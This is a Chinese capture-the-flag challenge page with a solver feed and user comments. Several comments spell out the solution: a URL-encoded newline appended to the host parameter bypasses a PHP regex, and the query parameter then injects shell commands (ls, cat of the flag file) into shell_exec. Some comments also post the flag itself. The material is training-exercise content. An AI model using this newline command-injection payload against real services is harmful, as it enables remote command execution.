评分(0)
暂无评分
解题动态
![](/static/images/face.webp)
yinbug 攻破了该题 1天前
![](/static/images/face.webp)
15756309355 攻破了该题 1天前
![](/static/images/face.webp)
wj834722134 攻破了该题 1天前
![](/static/images/face.webp)
miko88 攻破了该题 2天前
![](/static/images/face.webp)
竹盐笙熙 攻破了该题 3天前
![](/static/images/face.webp)
1813692149 攻破了该题 3天前
![](/static/images/face.webp)
NeilOvO 攻破了该题 3天前
![](/static/images/face.webp)
crushyjp 攻破了该题 4天前
![](/static/images/face.webp)
admin123456789qwer 攻破了该题 4天前
![](/static/images/face.webp)
dulinping 攻破了该题 4天前
![](/static/images/face.webp)
xlogsrc 攻破了该题 6天前
![](/static/images/face.webp)
花落时相遇 攻破了该题 8天前
![](/static/images/face.webp)
awoawo 攻破了该题 8天前
![](/static/images/face.webp)
大器晚成鹏鹏 攻破了该题 9天前
![](/static/images/face.webp)
bu5yer 攻破了该题 9天前
![](/upload/user/20240718/a119638564e3ca270d1456696e777bf7.webp)
XmN<=GzR 攻破了该题 9天前
![](/static/images/face.webp)
skyhigh 攻破了该题 11天前
![](/static/images/face.webp)
zhz0013 攻破了该题 11天前
![](/static/images/face.webp)
Jokerz 攻破了该题 12天前
![](/static/images/face.webp)
评论
wj834722134 1天前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
Tao23 1月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 2月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 3月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 3月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
15614005380 5月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
unknown237819 6月前
举报
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
868954104 7月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
vchopin 7月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
yituoshi 8月前
举报
Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE